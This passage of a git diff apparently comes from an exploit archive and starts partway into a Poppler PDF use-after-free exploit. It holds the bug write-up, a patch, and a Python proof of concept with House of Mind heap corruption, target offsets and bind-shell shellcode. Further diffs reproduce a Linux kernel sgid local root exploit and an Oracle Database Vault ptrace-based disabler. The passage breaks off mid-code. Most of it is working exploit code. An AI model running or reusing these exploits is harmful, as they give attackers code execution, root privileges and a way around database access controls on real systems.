+maleficarum to enter the scene. + +Look at the Page class constructor on Page.cc:231. 
First at the begining +of the function the member object pageWidgets isnt initialized then it +tries to check if the type of the annotations proposed on the pdf file +ar correct; if not it bails out to the label err2. Note that is some +incorcondance on the type of the anotation arise the member variable +pageWidgets is never initialized! + +Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { + Object tmp; +[...] + // annotations + pageDict->lookupNF("Annots", &annots); + if (!(annots.isRef() || annots.isArray() || annots.isNull())) { + error(-1, "Page annotations object (page %d) is wrong type (%s)", + num, annots.getTypeName()); + annots.free(); + goto err2; + } + + // forms + pageWidgets = new FormPageWidgets(xrefA, this->getAnnots(&tmp),num,form); + tmp.free(); +[...] + err2: + annots.initNull(); + err1: + contents.initNull(); + ok = gFalse; +} + +But in the Page class destructor, Page.cc:309, pageWidgets is deleted +without any consideration. The Page destructor is inmediatelly called +after the erroneous Page construction. + +Page::~Page() { + delete pageWidgets; + delete attrs; + annots.free(); + contents.free(); +} + + +It is worth mentioning that the pdf rendering scenario is friendly with +the heap massage technics because you will find lots of ways to allocate +or allocate/free memory in the already probided functionality. In the +POC I have used repetidely the 'name' of the fields of a pdf dictionary +to allocate memory. Each name allocates up to 127bytes and apparently +there is no limit in the number of fields. + + +The following excerpt is a sample verification of the existence of +the problem : + +localhost expl-poppler # python poppler-exploit-rc8.py gentoo-pdftotext >test.pdf +localhost expl-poppler # pdftotext test.pdf +Error: PDF file is damaged - attempting to reconstruct xref table... 
+Error: Annotation rectangle is wrong type +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Page annotations object (page 3) is wrong type (integer) +Error: Page count in top-level pages object is incorrect +Error: Couldnt read page catalog +Trace/breakpoint trap + +:) + + +Further research should be done to accomodate the heap for other applications like evince: +localhost expl-poppler # evince test.pdf + +(evince:8912): GnomeUI-WARNING **: While connecting to session manager: +Authentication Rejected, reason : None of the authentication protocols specified are supported and host-based authentication failed. + +** (evince:8912): WARNING **: Service registration failed. + +** (evince:8912): WARNING **: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. +Error: PDF file is damaged - attempting to reconstruct xref table... +Error: Annotation rectangle is wrong type +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Bad bounding box for annotation +Error: Page annotations object (page 3) is wrong type (integer) +*** glibc detected *** evince: munmap_chunk(): invalid pointer: 0x08100468 *** + +Note that 0x08100468 is still a provided pointer. But in this try some +malloc structure like _heap_info (see. house of mind) is not correctly +aligned any more. Maybe evince-thumbnailer which is (probably +monothreaded) is an easier target. 
+ + +Patch +===== + +diff --git a/poppler/Page.cc b/poppler/Page.cc +index b28a3ee..72a706b 100644 +--- a/poppler/Page.cc ++++ b/poppler/Page.cc +@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) { + + Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) { + Object tmp; +- ++ pageWidgets = NULL; //Security fix + ok = gTrue; + xref = xrefA; + num = numA; + + +POC: +=== + +Written in pyploit. It can be used 2 ways , one selecting a preconfigured +target like *gentoo-pdftotext* or the other in which you could pass some +malloc/free execution trace moddifing parameters. + +''' + +import struct +import struct +import math +import os + +import sys + +## print "%.400f"%d wont work :( ... so a quick double printing class +class Doubles: + def __init__(self, precision=400): + self.precision=precision + + def pdficateint(self,i1,i2): + s = struct.pack("@L",i1) + struct.pack("@L",i2) + return self.pdficatestr(s) + + def pdficate(self,s): + rslt = " " + for pos in range (0,len(s)/8): + rslt+=self.pdficatestr(s[(pos*8):(pos*8)+8])+" " + return rslt; + + def pdficatestr(self, s): + d = struct.unpack("d",s)[0] + rslt=" " + if(d<0.0): + rslt+="-" + d=-d + rslt+="%d."%int(math.floor(d)) + myd=math.floor(d) + scale=0.1 + nines=0 + for p in range(1,self.precision): + for i in range(1,10): + if (myd+scale*i) > d: + i-=1 + break + if i==9: + if nines>6: + return rslt + else: + nines+=1 + else: + nines=0 + rslt+=("%02d"%i)[1] + myd+=scale* i + scale=scale*0.1 + return rslt + +##From Malloc maleficarum +##http://packetstormsecurity.org/papers/attack/MallocMaleficarum.txt +class HouseOfMind: + + HEAP_MAX_SIZE=(1024*1024) + JMP='\xeb' + NOP='\x90' + PAD='\x00' + PREV_INUSE=0x1 + IS_MMAPPED=0x2 + NON_MAIN_ARENA=0x4 + def __init__(self, base, where, payload, entrypoint): + self.base=base + self.where=where-0xc + self.heap_info = (base+self.HEAP_MAX_SIZE-1)& ~(self.HEAP_MAX_SIZE-1) + self.payload=payload + 
self.entrypoint=entrypoint + self.chunkaddress=0 + if (self.entrypoint > 0xff - 8): + throw + +## lendian, 32bit only +## See The Malloc Maleficarum / House of Mind + def mind(self): + rslt = "" + #first we add padding to reach the next Heap border + rslt+=self.PAD*(self.heap_info-self.base) + + #now we add a _heap_info pinting to a malloc_state of our own + #and dictating a generous size for this *heap* + ##arena.c:59 //struct _heap_info + rslt += struct.pack(" unlocked. + rslt += struct.pack(" +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | Size of previous chunk, if allocated | | +# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | Size of chunk, in bytes |M|P| +# mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | User data starts here... . +# . . +# . (malloc_usable_size() bytes) . +# . | +#nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +# | Size of chunk | +# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + + #chunk 0 There isn't a single reason for this to exist * wabaaaaaaaaaa! 
+# rslt += struct.pack(">\nstream...\nendstream\n"])) + catalog = PDFDict() + catalog.add("Type", PDFName("Catalog")) + catalog.add("Outlines", "3 0 R") + catalog.add("Pages", "4 0 R") + catalog.add("AcroForm", "<>") + + #for i in range(0,1000): + # catalog.add( "C"*82 + "%05d"%i, 0) + + outlines = PDFDict() + outlines.add("Type", PDFName("Outlines")) + outlines.add("Count",0) + + pages = PDFDict() + pages.add("Type", PDFName("Pages")) + pages.add("Kids","[ 8 0 R 6 0 R 5 0 R ]") + pages.add("Count","3") + + doc.add(PDFObject([catalog])) + doc.add(PDFObject([outlines])) + doc.add(PDFObject([pages])) + + page1 = PDFDict() + page1.add("Type", PDFName("Page")) + page1.add("Parent", "4 0 R") + page1.add("MediaBox","[ 0 0 612 792 ]") + page1.add("Contents", "1 0 R") + page1.add("Resources", "<< /ProcSet 6 0 R >>") + page1.add("Annots", "0") + + #malloc-fill-free lots of chunks of the size then used by Page class(88) + for pagesize in range(88,126): + payload = ("".join(["#%02x"%ord(struct.pack("@L",hm.chunkaddress)[i]) for i in range (0,4)]))*19 + payload += "B"*(pagesize-(len(payload)/3)) + for i in range(0,10): + page1.add(payload, 0) + + doc.add(PDFObject([page1])) + + page1 = PDFDict() + page1.add("Type", PDFName("Page")) + page1.add("Parent", "4 0 R") + page1.add("MediaBox","[ 0 0 612 792 ]") + page1.add("Contents", "1 0 R") + page1.add("Resources", "<< /ProcSet 6 0 R >>") + page1.add("Annots", "[7 0 R 7 0 R 7 0 R 7 0 R]") + + #massage session 1 + size=127 + for i in range(0,massage[0]): + page1.add( "A"*(size-5)+("%05d"%(i)), "B"*size) + + doc.add(PDFObject([page1])) + annots = PDFDict() + annots.add("Subtype","/Text") + + annots.add("BS", "<? 
+ "0.0 "*massage[2] + " ]>>") + + annots.add("FT", "/Tx") + doc.add(PDFObject([annots])) + + page1 = PDFDict() + page1.add("Type", PDFName("Page")) + page1.add("Parent", "4 0 R") + page1.add("MediaBox","[ 0 0 612 792 ]") + page1.add("Contents", "1 0 R") + page1.add("Resources", "<< /ProcSet 6 0 R >>") + page1.add("Annots", "[7 0 R]") + doc.add(PDFObject([page1])) + doc.add(PDFObject(["<<>>"])) + doc.add(PDFObject(["[ /PDF ]"])) + return doc.__str__() + + +##Main +## Not every shellcode will work by now +## Only the ones that taken by 8bytes form an ieee754 double presicion float +## with an exponent not too positive ... :) + +## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com +scode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +scode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +scode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +scode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +scode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +scode += "\x89\xe1\xcd\x80" + +#expl = PopplerExpl( ('\xcc'+'\x90')*((160-16)/2)) +expl = PopplerExpl(scode) + +targets = { + "gentoo-pdftotext":(0x08100000, 0x804c014, 1863, 20, 400), + "debian4-pdftotext":(0x08100000, 0x804bb18, 1879, 33, 400), + "gentoo-evince-thumbnailer": (0x8100000, 0x080712c4, 907, 34, 200), + +} + +if len( sys.argv )==1: + print "Comments -> fmanzano@fceia.unr.edu.ar" + print "Usage 1:" + print " %s "%sys.argv[0], targets.keys() + print "Usage 2:" + print " %s massage1 massage2 massage3 base got"%sys.argv[0] + print " The idea here is to align the _heap_info struct that commences with 0x08?00010 " + print " to the address 0x8?0000. For this pourpose move massage1/2/3. " + print " THIS STUPIDLY SIMPLE METHOD WOULD WORK FOR VERY FEW APPS !" 
+ print " base is the 1024*1024 bytes aligned address to which we are trying to align everything" + print " got is the addres of the got where the thing is going to write the shellcode address" + print " BTW by now the shellcode is nop;int 3;nop...grooovy!.. NOT" +elif len( sys.argv )>2: + print expl.make(int(sys.argv[4][2:],16), int(sys.argv[5][2:],16), (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))) +else: + #base: the expected heap limit (08100000,08200000,....08f00000... ) + #got: address of the got entry to change + #chinesse massage + base,got,massage1,massage2,massage3 = targets[sys.argv[1]] + print expl.make(base,got,(massage1,massage2,massage3)) + +# milw0rm.com [2008-07-08] diff --git a/platforms/linux/local/624.c b/platforms/linux/local/624.c index 0c016d5c0..24a3e3a90 100755 --- a/platforms/linux/local/624.c +++ b/platforms/linux/local/624.c @@ -157,6 +157,6 @@ int fd, nl, pid; unlink(BADNAME); return 0; -} - -// milw0rm.com [2004-11-10] +} + +// milw0rm.com [2004-11-10] diff --git a/platforms/linux/local/657.c b/platforms/linux/local/657.c index cdec745e0..9330b1792 100755 --- a/platforms/linux/local/657.c +++ b/platforms/linux/local/657.c @@ -371,6 +371,6 @@ int main(int argc, char *argv[]) { printf("Kazdemu trafi sie gowno...!\n"); return 0; } -} - -// milw0rm.com [2004-11-25] +} + +// milw0rm.com [2004-11-25] diff --git a/platforms/linux/local/669.c b/platforms/linux/local/669.c index 64c3acc94..5524b63db 100755 --- a/platforms/linux/local/669.c +++ b/platforms/linux/local/669.c @@ -127,6 +127,6 @@ sh-2.05b# ************************************************************ thats all . have fun ! -*/ - -// milw0rm.com [2004-12-01] +*/ + +// milw0rm.com [2004-12-01] diff --git a/platforms/linux/local/6851.c b/platforms/linux/local/6851.c index cb1ffe9bf..9956f0809 100755 --- a/platforms/linux/local/6851.c +++ b/platforms/linux/local/6851.c 
@@ -1,88 +1,88 @@
-/*
-gw-ftrex.c:
-
-Linux kernel < 2.6.22 open/ftruncate local exploit
-by
-
-bug information:
-http://osvdb.org/49081
-
-
-!!!This is for educational purposes only!!!
-
-To use it, you've got to find a sgid directory you've got
-permissions to write into (obviously world-writable), e.g:
-find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx"
-which fortunately is not common those days :)
-And also a shell that does not drop sgid privs upon execution (like ash/sash).
-E.g:
-
-test:/fileserver/samba$ ls -ld
-drwxrwsrwx 2 root root 4096 2008-10-27 16:27.
-test:/fileserver/samba$ id
-uid=33(www-data) gid=33(www-data) groups=33(www-data)
-test:/fileserver/samba$ /tmp/gw-ftrex
-ash shell found!
-size=80200
-We're evil evil evil!
-
-$ id
-uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data)
-
-Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia.
-*/
-
-
-
-#include
-#include
-#include
-#include
-
-int main(int argc, char *argv[])
-{
-char *buf=malloc(3096*1024); //3mb just to be sure
-int a,len;
-int fd,fd1;
-char *buf1;
-int shell=0;
-
-
-if (stat("/bin/ash",buf)==0)
-{
- printf("ash shell found!\n");
- shell=1;
-}
-
-if (shell==0) if (stat("/bin/sash",buf)==0)
-{
- printf("sash shell found!\n");
- shell=1;
-}
-
-if (shell==0)
-{
- printf("no suitable shell found (one that does not drop sgid permissions) :(\n");
- exit(2);
-}
-
-
-len=0;
-if (shell==1) fd=open("/bin/ash",O_RDONLY);
-if (shell==2) fd=open("/bin/sash",O_RDONLY);
-
-while (read(fd,buf+len,1)) len++;
-
-printf("size=%d\n",len);
-fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750);
-ftruncate(fd1, len);
-buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0);
-memcpy(buf1,buf,len);
-munmap(buf1,len);
-close(fd1);close(fd);
-free(buf);
-printf("We're evil evil evil!\n\n");
-execv(".evilsploit", NULL);
-}
-
-// milw0rm.com [2008-10-27]
+/*
+gw-ftrex.c:
+
+Linux kernel < 2.6.22 open/ftruncate local exploit
+by
+
+bug information:
+http://osvdb.org/49081
+
+
+!!!This is for educational purposes only!!!
+
+To use it, you've got to find a sgid directory you've got
+permissions to write into (obviously world-writable), e.g:
+find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx"
+which fortunately is not common those days :)
+And also a shell that does not drop sgid privs upon execution (like ash/sash).
+E.g:
+
+test:/fileserver/samba$ ls -ld
+drwxrwsrwx 2 root root 4096 2008-10-27 16:27.
+test:/fileserver/samba$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+test:/fileserver/samba$ /tmp/gw-ftrex
+ash shell found!
+size=80200
+We're evil evil evil!
+
+$ id
+uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data)
+
+Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia.
+*/
+
+
+
+#include
+#include
+#include
+#include
+
+int main(int argc, char *argv[])
+{
+char *buf=malloc(3096*1024); //3mb just to be sure
+int a,len;
+int fd,fd1;
+char *buf1;
+int shell=0;
+
+
+if (stat("/bin/ash",buf)==0)
+{
+ printf("ash shell found!\n");
+ shell=1;
+}
+
+if (shell==0) if (stat("/bin/sash",buf)==0)
+{
+ printf("sash shell found!\n");
+ shell=1;
+}
+
+if (shell==0)
+{
+ printf("no suitable shell found (one that does not drop sgid permissions) :(\n");
+ exit(2);
+}
+
+
+len=0;
+if (shell==1) fd=open("/bin/ash",O_RDONLY);
+if (shell==2) fd=open("/bin/sash",O_RDONLY);
+
+while (read(fd,buf+len,1)) len++;
+
+printf("size=%d\n",len);
+fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750);
+ftruncate(fd1, len);
+buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0);
+memcpy(buf1,buf,len);
+munmap(buf1,len);
+close(fd1);close(fd);
+free(buf);
+printf("We're evil evil evil!\n\n");
+execv(".evilsploit", NULL);
+}
+
+// milw0rm.com [2008-10-27]
diff --git a/platforms/linux/local/695.c b/platforms/linux/local/695.c
index 7042de2f1..754c3ea69 100755
--- a/platforms/linux/local/695.c
+++ b/platforms/linux/local/695.c
@@ -34,6 +34,6 @@ main(int ac, char *av[]) { } return 0; -} - -// milw0rm.com [2004-12-17] +} + +// milw0rm.com [2004-12-17] diff --git a/platforms/linux/local/71.c b/platforms/linux/local/71.c index 1c292e058..3f54feeac 100755 --- a/platforms/linux/local/71.c +++ b/platforms/linux/local/71.c @@ -72,6 +72,6 @@ setenv ("HOME", out, 1); banner (); execl (BIN, BIN, "-scores", 0x0); // the switch "-scores" is necessary to exploit the game -} - -// milw0rm.com [2003-07-31] +} + +// milw0rm.com [2003-07-31] diff --git a/platforms/linux/local/7177.c b/platforms/linux/local/7177.c index 98494eac5..cc75bb935 100755 --- a/platforms/linux/local/7177.c +++ b/platforms/linux/local/7177.c 
@@ -1,301 +1,301 @@ -/* - * original release: http://vnull.pcnet.com.pl/blog/?p=92 - * - * ora_dv_mem_off.c version 0x1 - * ORACLE Database Vault runtime disabler (x86_32 Linux only) - * AKA give_back_the_freedom - * by Jakub 'vnull' Wartak 26.02.2008 - * 0-day PRIVATE! D0 N0T DI$TRIBUT3! - * - * Tested on 10.2.0.3, CentOS 5. - * For other architectures/OS combos consider having fun with gdb ;] - * - * Whole Database Vault architecture is flawed if DBA has access to - * oracle user process space. IMHO you could limit risk by creating - * UNIX accounts for DBAs with membership of OSDBA group (along with - * oracle SUID binary and shared memory with only read permission - * for OSDBA group [check SHM privs: ipcs -cm] ). But how those DBAs - * would cope with some serious crashes (requiring for e.g. restoring - * controlfile) ? - * - * Usage: - * Set enviorniment variables: ORACLE_BASE, ORACLE_SID, ORACLE_HOME - * $ gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty - * $ ./ora_dv_mem_off - * - * REQUIEREMENTS: - * + run as oracle process owner (by default "oracle") - * + working ptrace(), it won't work in systems with ptrace() - * disabled (grsecurity and some LKMs). - * + BFD headers and library (binutils-devel) - * - * THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE - * CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE - * LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES, - * LOSSES OR UNLAWFUL OFFENCES. - * - * USE AT OWN RISK! - * - */ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include /* for __NR_clone */ - -/* you may need to alter this */ -#define ORABASE "/u01/app/oracle/product/10.2.0/bin" - -/* - * Magic... (at&t syntax) - * push %ebp - * mov %esp, %ebp - * mov , %eax - * [..] 
- * where DV_FLAG is 32-bit long - */ -#define ASM_DV_FUNC_PROLOG "\x55\x8b\xec\xb8" - -const char *sqlplus = ORABASE "/sqlplus"; -const char *oracle = ORABASE "/oracle"; -const int long_size = sizeof(long); -pid_t child; - -long locate_dv_func(void) -{ - asymbol **symbol_table; - bfd *b = bfd_openr(oracle, NULL); - if (b == NULL) { - perror("bfd_openr"); - exit(-1); - } - - bfd_check_format(b, bfd_object); - long storage_needed = bfd_get_symtab_upper_bound(b); - if(storage_needed < 0) { - fprintf(stderr, "wtf?!\n"); - exit(-1); - } - - if((symbol_table = (asymbol**)malloc(storage_needed)) == 0) { - perror("malloc"); - exit(-1); - } - - int num_symbols; - if((num_symbols = bfd_canonicalize_symtab(b, symbol_table)) <= 0) { - fprintf(stderr, "no symbols info\n"); - exit(-1); - } - - int i; - for(i = 0; i < num_symbols; i++) { - char *symname = bfd_asymbol_name(symbol_table[i]); - void *symaddr = bfd_asymbol_value(symbol_table[i]); - /* don't even ask why this funciton, for real hardcore: gdb -p */ - if(!strcmp(symname, "kzvtins")) { - fprintf(stderr, "[%d] symbol \"kzvtins\" at 0x%lx\n", getpid(), - (long) symaddr); - return (long) symaddr; - } - } - - return 0; -} - -/* from "Playing with ptrace(), part#2, Linux Journal, author: Pradeep Padala */ -void getdata(pid_t child, long addr, char *str, int len) -{ - char *laddr; - int i, j; - union u { - long val; - char chars[long_size]; - } data; - i = 0; - j = len / long_size; - laddr = str; - while(i < j) { - data.val = ptrace(PTRACE_PEEKDATA, child, addr + i * 4, NULL); - memcpy(laddr, data.chars, long_size); - ++i; - laddr += long_size; - } - j = len % long_size; - if(j != 0) { - data.val = ptrace(PTRACE_PEEKDATA,child, addr + i * 4,NULL); - memcpy(laddr, data.chars, j); - } - str[len] = '\0'; -} - -void putdata(pid_t child, long addr, char *str, int len) -{ - char *laddr; - int i, j; - union u { - long val; - char chars[long_size]; - } data; - i = 0; - j = len / long_size; - laddr = str; - while(i < j) { - 
memcpy(data.chars, laddr, long_size); - ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); - ++i; - laddr += long_size; - } - j = len % long_size; - if(j != 0) { - memcpy(data.chars, laddr, j); - ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); - } -} - -void cleanup(void) -{ - int s; - kill(child, SIGKILL); - wait(&s); -} - -int main(int ac, char **av) -{ - int status; - pid_t orapid = 0; - - bfd_init(); - - if((child = fork()) == -1) { - perror("fork"); - exit(-1); - } - - if(child == 0) { - if(ptrace(PTRACE_TRACEME, 0, NULL, NULL)==-1) { - perror("unable to ptrace(PTRACE_TRACEME)"); - exit(-1); - } - - /* launch sqlplus */ - if(execl(sqlplus, "sqlplus", "/nolog", NULL)==-1) { - perror("execl"); - exit(-1); - } - - /* not reached */ - exit(0); - } - - if(atexit(cleanup) != 0) { - fprintf(stderr, "[%d] unable to register cleanup function\n", getpid()); - } - - wait(&status); - if(WIFSTOPPED(status)) { - fprintf(stderr, "[%d] starting to trace sqlplus process (%d)\n", getpid(), child); - } - - fprintf(stderr, "[***] NOW TYPE IN SQLPLUS: conn / as sysdba\n"); - - while(!orapid) { - struct user_regs_struct uregs; - - ptrace(PTRACE_SYSCALL, child, 0, 0); - wait(&status); - ptrace(PTRACE_GETREGS, child, 0, &uregs); - - /* ouch! no fork()? clone()! 
*/ - if(uregs.orig_eax==__NR_clone) { - long *regs = 0; - - /* fprintf(stderr, "[%d] clone() syscall\n", getpid()); */ - ptrace(PTRACE_SYSCALL, child, 0, 0); - wait(&status); - if((orapid = ptrace(PTRACE_PEEKUSER, child, ®s[EAX], 0)) == -1) { - perror("ptrace(PTRACE_PEEKUSER): unable to get clone() retvalue\n"); - exit(-1); - } - fprintf(stderr, "[%d] clone() syscall in %d, tracing orapid=%d\n", getpid(), - child, orapid); - - /* attach to orapid, detach from sqlplus */ - if(ptrace(PTRACE_ATTACH, orapid, 0, 0) == -1) { - perror("ptrace(PTRACE_ATTACH) to orapid"); - exit(-1); - } - - while(1) { - ptrace(PTRACE_SYSCALL, orapid, 0, 0); - wait(&status); - ptrace(PTRACE_GETREGS, orapid, 0, &uregs); - if(uregs.orig_eax==__NR_execve) { - fprintf(stderr, "[%d] execve() syscall in %d, \n", getpid(), orapid); - /* end ptrace of syscall */ - ptrace(PTRACE_SYSCALL, orapid, 0, 0); - break; - } else { - //fprintf(stderr, "got %ld\n", uregs.orig_eax); - ptrace(PTRACE_SYSCALL, orapid, 0, 0); - } - } - - if(ptrace(PTRACE_DETACH, child, 0, 0) == -1) { - perror("ptrace(PTRACE_DETACH) from child"); - exit(-1); - } - - } else if(uregs.orig_eax==__NR_execve) { - fprintf(stderr, "[%d] execve() syscall in %d\n", getpid(), child); - } - } - - /* now we have oracle server process under our control :) */ - long dv_func = locate_dv_func(); - if(dv_func == 0) { - fprintf(stderr, "ERROR: unable to find function\n"); - exit(-1); - } - wait(&status); - - unsigned char buf[32]; - memset(buf, 0, sizeof(buf)); - getdata(orapid, dv_func, (char *)&buf, 32); - - /* dump opcodes */ - /* - for(i = 0; i < 31; i++) { - fprintf(stderr, "%x ", (unsigned char)buf[i]); - } */ - - if(!memcmp(buf, ASM_DV_FUNC_PROLOG, strlen(ASM_DV_FUNC_PROLOG))) { - unsigned char dv_status; - unsigned long woff = dv_func + strlen(ASM_DV_FUNC_PROLOG), woff2=woff; - - getdata(orapid, woff, (char *)&dv_status, 1); - fprintf(stderr, "[***] sucessfuly validated function, DatabaseVault=%d\n", dv_status); - fprintf(stderr, "[***] 
attempting to rewrite memory at 0x%lx\n", woff2); - - unsigned char my = 0; - putdata(orapid, woff2, (void *)&my, 1); - } - - if(ptrace(PTRACE_DETACH, orapid, 0, 0) == -1) { - perror("ptrace(PTRACE_DETACH) from orapid"); - exit(-1); - } - - wait(&status); - exit(0); -} - -// milw0rm.com [2008-11-20] +/* + * original release: http://vnull.pcnet.com.pl/blog/?p=92 + * + * ora_dv_mem_off.c version 0x1 + * ORACLE Database Vault runtime disabler (x86_32 Linux only) + * AKA give_back_the_freedom + * by Jakub 'vnull' Wartak 26.02.2008 + * 0-day PRIVATE! D0 N0T DI$TRIBUT3! + * + * Tested on 10.2.0.3, CentOS 5. + * For other architectures/OS combos consider having fun with gdb ;] + * + * Whole Database Vault architecture is flawed if DBA has access to + * oracle user process space. IMHO you could limit risk by creating + * UNIX accounts for DBAs with membership of OSDBA group (along with + * oracle SUID binary and shared memory with only read permission + * for OSDBA group [check SHM privs: ipcs -cm] ). But how those DBAs + * would cope with some serious crashes (requiring for e.g. restoring + * controlfile) ? + * + * Usage: + * Set enviorniment variables: ORACLE_BASE, ORACLE_SID, ORACLE_HOME + * $ gcc -Wall ora_dv_mem_off.c -o ora_dv_mem_off -lbfd -liberty + * $ ./ora_dv_mem_off + * + * REQUIEREMENTS: + * + run as oracle process owner (by default "oracle") + * + working ptrace(), it won't work in systems with ptrace() + * disabled (grsecurity and some LKMs). + * + BFD headers and library (binutils-devel) + * + * THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE + * CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE + * LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES, + * LOSSES OR UNLAWFUL OFFENCES. + * + * USE AT OWN RISK! 
+ * + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include /* for __NR_clone */ + +/* you may need to alter this */ +#define ORABASE "/u01/app/oracle/product/10.2.0/bin" + +/* + * Magic... (at&t syntax) + * push %ebp + * mov %esp, %ebp + * mov , %eax + * [..] + * where DV_FLAG is 32-bit long + */ +#define ASM_DV_FUNC_PROLOG "\x55\x8b\xec\xb8" + +const char *sqlplus = ORABASE "/sqlplus"; +const char *oracle = ORABASE "/oracle"; +const int long_size = sizeof(long); +pid_t child; + +long locate_dv_func(void) +{ + asymbol **symbol_table; + bfd *b = bfd_openr(oracle, NULL); + if (b == NULL) { + perror("bfd_openr"); + exit(-1); + } + + bfd_check_format(b, bfd_object); + long storage_needed = bfd_get_symtab_upper_bound(b); + if(storage_needed < 0) { + fprintf(stderr, "wtf?!\n"); + exit(-1); + } + + if((symbol_table = (asymbol**)malloc(storage_needed)) == 0) { + perror("malloc"); + exit(-1); + } + + int num_symbols; + if((num_symbols = bfd_canonicalize_symtab(b, symbol_table)) <= 0) { + fprintf(stderr, "no symbols info\n"); + exit(-1); + } + + int i; + for(i = 0; i < num_symbols; i++) { + char *symname = bfd_asymbol_name(symbol_table[i]); + void *symaddr = bfd_asymbol_value(symbol_table[i]); + /* don't even ask why this funciton, for real hardcore: gdb -p */ + if(!strcmp(symname, "kzvtins")) { + fprintf(stderr, "[%d] symbol \"kzvtins\" at 0x%lx\n", getpid(), + (long) symaddr); + return (long) symaddr; + } + } + + return 0; +} + +/* from "Playing with ptrace(), part#2, Linux Journal, author: Pradeep Padala */ +void getdata(pid_t child, long addr, char *str, int len) +{ + char *laddr; + int i, j; + union u { + long val; + char chars[long_size]; + } data; + i = 0; + j = len / long_size; + laddr = str; + while(i < j) { + data.val = ptrace(PTRACE_PEEKDATA, child, addr + i * 4, NULL); + memcpy(laddr, data.chars, long_size); + ++i; + laddr += long_size; + } + j = len % long_size; + if(j != 0) { + 
data.val = ptrace(PTRACE_PEEKDATA,child, addr + i * 4,NULL); + memcpy(laddr, data.chars, j); + } + str[len] = '\0'; +} + +void putdata(pid_t child, long addr, char *str, int len) +{ + char *laddr; + int i, j; + union u { + long val; + char chars[long_size]; + } data; + i = 0; + j = len / long_size; + laddr = str; + while(i < j) { + memcpy(data.chars, laddr, long_size); + ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); + ++i; + laddr += long_size; + } + j = len % long_size; + if(j != 0) { + memcpy(data.chars, laddr, j); + ptrace(PTRACE_POKEDATA, child, addr + i * 4, data.val); + } +} + +void cleanup(void) +{ + int s; + kill(child, SIGKILL); + wait(&s); +} + +int main(int ac, char **av) +{ + int status; + pid_t orapid = 0; + + bfd_init(); + + if((child = fork()) == -1) { + perror("fork"); + exit(-1); + } + + if(child == 0) { + if(ptrace(PTRACE_TRACEME, 0, NULL, NULL)==-1) { + perror("unable to ptrace(PTRACE_TRACEME)"); + exit(-1); + } + + /* launch sqlplus */ + if(execl(sqlplus, "sqlplus", "/nolog", NULL)==-1) { + perror("execl"); + exit(-1); + } + + /* not reached */ + exit(0); + } + + if(atexit(cleanup) != 0) { + fprintf(stderr, "[%d] unable to register cleanup function\n", getpid()); + } + + wait(&status); + if(WIFSTOPPED(status)) { + fprintf(stderr, "[%d] starting to trace sqlplus process (%d)\n", getpid(), child); + } + + fprintf(stderr, "[***] NOW TYPE IN SQLPLUS: conn / as sysdba\n"); + + while(!orapid) { + struct user_regs_struct uregs; + + ptrace(PTRACE_SYSCALL, child, 0, 0); + wait(&status); + ptrace(PTRACE_GETREGS, child, 0, &uregs); + + /* ouch! no fork()? clone()! 
